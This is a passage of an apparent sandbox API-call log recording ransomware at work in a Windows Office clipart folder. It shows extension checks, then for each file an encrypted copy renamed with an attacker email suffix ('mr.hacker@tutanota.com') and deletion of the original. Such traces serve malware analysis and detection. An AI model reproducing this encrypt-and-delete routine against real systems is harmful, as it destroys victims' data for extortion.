lpString2="_.WMF") returned -1 [0270.008] lstrlenW (lpString=".ppt") returned 4 [0270.008] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0270.008] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01172_.WMF") returned 63 [0270.008] lstrlenW (lpString=".zip") returned 4 [0270.008] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0270.008] lstrlenW (lpString=".rar") returned 4 [0270.008] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0270.008] lstrlenW (lpString=".bz2") returned 4 [0270.008] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0270.008] lstrlenW (lpString=".7z") returned 3 [0270.008] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0270.009] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01172_.WMF") returned 63 [0270.009] lstrlenW (lpString=".dbf") returned 4 [0270.009] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0270.009] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01172_.WMF") returned 63 [0270.009] lstrlenW (lpString=".1cd") returned 4 [0270.009] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0270.009] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01172_.WMF") returned 63 [0270.009] lstrlenW (lpString=".jpg") returned 4 [0270.009] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0270.009] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01172_.WMF") returned 63 [0270.009] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01172_.WMF") returned 63 [0270.009] lstrlenW (lpString=".doc") returned 4 [0270.009] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0270.009] lstrlenW (lpString=".docx") returned 5 [0270.009] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0270.009] lstrlenW (lpString=".pdf") returned 4 [0270.009] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0270.009] lstrlenW (lpString=".xls") returned 4 [0270.009] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0270.009] lstrlenW (lpString=".xlsx") returned 5 [0270.009] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0270.009] lstrlenW (lpString=".ppt") returned 4 [0270.009] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0270.009] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01172_.WMF") returned 63 [0270.009] lstrlenW (lpString=".zip") returned 4 [0270.009] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0270.009] lstrlenW (lpString=".rar") returned 4 [0270.009] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0270.010] lstrlenW (lpString=".bz2") returned 4 [0270.010] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0270.010] lstrlenW (lpString=".7z") returned 3 [0270.010] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0270.010] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01172_.WMF") returned 63 [0270.010] lstrlenW (lpString=".dbf") returned 4 [0270.010] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0270.010] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01172_.WMF") returned 63 [0270.010] lstrlenW (lpString=".1cd") returned 4 [0270.010] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0270.010] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01172_.WMF") returned 63 [0270.010] lstrlenW (lpString=".jpg") returned 4 [0270.010] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0270.010] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0270.010] lstrlenW (lpString="DD01176_.WMF") returned 12 [0270.010] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01176_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01176_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4 [0270.010] GetFileSizeEx (in: hFile=0x3a4, lpFileSize=0x2e7ff1c | out: lpFileSize=0x2e7ff1c*=1888) returned 1 [0270.010] CloseHandle (hObject=0x3a4) returned 1 [0270.011] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01176_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01176_.wmf")) returned 0x20 [0270.011] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01176_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01176_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0270.011] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01176_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01176_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4 [0270.011] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.011] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.011] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01176_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01176_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0270.012] GetLastError () returned 0x0 [0270.012] ReadFile (in: hFile=0x3a4, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x760, lpOverlapped=0x0) returned 1 [0270.015] WriteFile (in: hFile=0x328, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0x770, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0x770, lpOverlapped=0x0) returned 1 [0270.016] ReadFile (in: hFile=0x3a4, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x0, lpOverlapped=0x0) returned 1 [0270.016] WriteFile (in: hFile=0x328, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0270.016] SetEndOfFile (hFile=0x328) returned 1 [0270.016] CloseHandle (hObject=0x328) returned 1 [0270.016] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.016] SetEndOfFile (hFile=0x3a4) returned 1 [0270.018] CloseHandle (hObject=0x3a4) returned 1 [0270.018] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01176_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0270.019] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01176_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01176_.wmf")) returned 1 [0270.019] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01176_.WMF") returned 63 [0270.019] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01176_.WMF") returned 63 [0270.019] lstrlenW (lpString=".doc") returned 4 [0270.019] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0270.019] lstrlenW (lpString=".docx") returned 5 [0270.019] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0270.019] lstrlenW (lpString=".pdf") returned 4 [0270.019] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0270.019] lstrlenW (lpString=".xls") returned 4 [0270.019] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0270.019] lstrlenW (lpString=".xlsx") returned 5 [0270.019] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0270.019] lstrlenW (lpString=".ppt") returned 4 [0270.019] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0270.019] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01176_.WMF") returned 63 [0270.019] lstrlenW (lpString=".zip") returned 4 [0270.019] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0270.019] lstrlenW (lpString=".rar") returned 4 [0270.019] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0270.019] lstrlenW (lpString=".bz2") returned 4 [0270.019] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0270.019] lstrlenW (lpString=".7z") returned 3 [0270.020] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0270.020] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01176_.WMF") returned 63 [0270.020] lstrlenW (lpString=".dbf") returned 4 [0270.020] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0270.020] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01176_.WMF") returned 63 [0270.020] lstrlenW (lpString=".1cd") returned 4 [0270.020] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0270.020] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01176_.WMF") returned 63 [0270.020] lstrlenW (lpString=".jpg") returned 4 [0270.020] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0270.020] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01176_.WMF") returned 63 [0270.020] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01176_.WMF") returned 63 [0270.020] lstrlenW (lpString=".doc") returned 4 [0270.020] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0270.020] lstrlenW (lpString=".docx") returned 5 [0270.020] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0270.020] lstrlenW (lpString=".pdf") returned 4 [0270.020] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0270.020] lstrlenW (lpString=".xls") returned 4 [0270.020] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0270.020] lstrlenW (lpString=".xlsx") returned 5 [0270.020] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0270.020] lstrlenW (lpString=".ppt") returned 4 [0270.020] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0270.020] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01176_.WMF") returned 63 [0270.021] lstrlenW (lpString=".zip") returned 4 [0270.021] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0270.021] lstrlenW (lpString=".rar") returned 4 [0270.021] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0270.021] lstrlenW (lpString=".bz2") returned 4 [0270.021] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0270.021] lstrlenW (lpString=".7z") returned 3 [0270.021] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0270.021] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01176_.WMF") returned 63 [0270.021] lstrlenW (lpString=".dbf") returned 4 [0270.021] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0270.021] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01176_.WMF") returned 63 [0270.021] lstrlenW (lpString=".1cd") returned 4 [0270.021] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0270.021] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01176_.WMF") returned 63 [0270.021] lstrlenW (lpString=".jpg") returned 4 [0270.021] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0270.021] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0270.021] lstrlenW (lpString="DD01178_.WMF") returned 12 [0270.021] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01178_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01178_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4 [0270.022] GetFileSizeEx (in: hFile=0x3a4, lpFileSize=0x2e7ff1c | out: lpFileSize=0x2e7ff1c*=3796) returned 1 [0270.022] CloseHandle (hObject=0x3a4) returned 1 [0270.022] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01178_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01178_.wmf")) returned 0x20 [0270.022] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01178_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01178_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0270.022] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01178_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01178_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4 [0270.022] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.022] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.022] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01178_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01178_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0270.023] GetLastError () returned 0x0 [0270.023] ReadFile (in: hFile=0x3a4, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0xed4, lpOverlapped=0x0) returned 1 [0270.025] WriteFile (in: hFile=0x328, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xee0, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0xee0, lpOverlapped=0x0) returned 1 [0270.028] ReadFile (in: hFile=0x3a4, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x0, lpOverlapped=0x0) returned 1 [0270.028] WriteFile (in: hFile=0x328, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0270.028] SetEndOfFile (hFile=0x328) returned 1 [0270.028] CloseHandle (hObject=0x328) returned 1 [0270.028] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.028] SetEndOfFile (hFile=0x3a4) returned 1 [0270.030] CloseHandle (hObject=0x3a4) returned 1 [0270.030] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01178_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0270.030] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01178_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01178_.wmf")) returned 1 [0270.030] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01178_.WMF") returned 63 [0270.030] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01178_.WMF") returned 63 [0270.030] lstrlenW (lpString=".doc") returned 4 [0270.030] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0270.030] lstrlenW (lpString=".docx") returned 5 [0270.030] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0270.030] lstrlenW (lpString=".pdf") returned 4 [0270.030] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0270.031] lstrlenW (lpString=".xls") returned 4 [0270.031] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0270.031] lstrlenW (lpString=".xlsx") returned 5 [0270.031] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0270.031] lstrlenW (lpString=".ppt") returned 4 [0270.031] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0270.031] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01178_.WMF") returned 63 [0270.031] lstrlenW (lpString=".zip") returned 4 [0270.031] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0270.031] lstrlenW (lpString=".rar") returned 4 [0270.031] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0270.031] lstrlenW (lpString=".bz2") returned 4 [0270.031] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0270.031] lstrlenW (lpString=".7z") returned 3 [0270.031] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0270.031] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01178_.WMF") returned 63 [0270.031] lstrlenW (lpString=".dbf") returned 4 [0270.031] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0270.031] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01178_.WMF") returned 63 [0270.031] lstrlenW (lpString=".1cd") returned 4 [0270.031] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0270.031] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01178_.WMF") returned 63 [0270.031] lstrlenW (lpString=".jpg") returned 4 [0270.031] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0270.031] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01178_.WMF") returned 63 [0270.032] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01178_.WMF") returned 63 [0270.032] lstrlenW (lpString=".doc") returned 4 [0270.032] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0270.032] lstrlenW (lpString=".docx") returned 5 [0270.032] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0270.032] lstrlenW (lpString=".pdf") returned 4 [0270.032] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0270.032] lstrlenW (lpString=".xls") returned 4 [0270.032] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0270.032] lstrlenW (lpString=".xlsx") returned 5 [0270.032] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0270.032] lstrlenW (lpString=".ppt") returned 4 [0270.032] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0270.032] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01178_.WMF") returned 63 [0270.032] lstrlenW (lpString=".zip") returned 4 [0270.032] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0270.032] lstrlenW (lpString=".rar") returned 4 [0270.032] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0270.032] lstrlenW (lpString=".bz2") returned 4 [0270.032] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0270.032] lstrlenW (lpString=".7z") returned 3 [0270.032] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0270.032] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01178_.WMF") returned 63 [0270.032] lstrlenW (lpString=".dbf") returned 4 [0270.032] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0270.032] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01178_.WMF") returned 63 [0270.032] lstrlenW (lpString=".1cd") returned 4 [0270.032] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0270.032] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01178_.WMF") returned 63 [0270.033] lstrlenW (lpString=".jpg") returned 4 [0270.033] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0270.033] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0270.033] lstrlenW (lpString="DD01179_.WMF") returned 12 [0270.033] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01179_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01179_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4 [0270.033] GetFileSizeEx (in: hFile=0x3a4, lpFileSize=0x2e7ff1c | out: lpFileSize=0x2e7ff1c*=2024) returned 1 [0270.033] CloseHandle (hObject=0x3a4) returned 1 [0270.033] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01179_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01179_.wmf")) returned 0x20 [0270.033] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01179_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01179_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0270.034] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01179_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01179_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4 [0270.034] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.034] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.034] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01179_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01179_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0270.035] GetLastError () returned 0x0 [0270.035] ReadFile (in: hFile=0x3a4, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x7e8, lpOverlapped=0x0) returned 1 [0270.037] WriteFile (in: hFile=0x328, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0x7f0, lpOverlapped=0x0) returned 1 [0270.037] ReadFile (in: hFile=0x3a4, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x0, lpOverlapped=0x0) returned 1 [0270.037] WriteFile (in: hFile=0x328, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0270.037] SetEndOfFile (hFile=0x328) returned 1 [0270.038] CloseHandle (hObject=0x328) returned 1 [0270.038] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.038] SetEndOfFile (hFile=0x3a4) returned 1 [0270.039] CloseHandle (hObject=0x3a4) returned 1 [0270.040] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01179_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0270.040] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01179_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01179_.wmf")) returned 1 [0270.040] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01179_.WMF") returned 63 [0270.040] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01179_.WMF") returned 63 [0270.040] lstrlenW (lpString=".doc") returned 4 [0270.040] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0270.040] lstrlenW (lpString=".docx") returned 5 [0270.040] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0270.141] lstrlenW (lpString=".pdf") returned 4 [0270.141] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0270.141] lstrlenW (lpString=".xls") returned 4 [0270.141] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0270.141] lstrlenW (lpString=".xlsx") returned 5 [0270.141] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0270.141] lstrlenW (lpString=".ppt") returned 4 [0270.141] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0270.141] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01179_.WMF") returned 63 [0270.141] lstrlenW (lpString=".zip") returned 4 [0270.141] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0270.141] lstrlenW (lpString=".rar") returned 4 [0270.141] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0270.141] lstrlenW (lpString=".bz2") returned 4 [0270.141] lstrcmpiW (lpString1=".bz2", 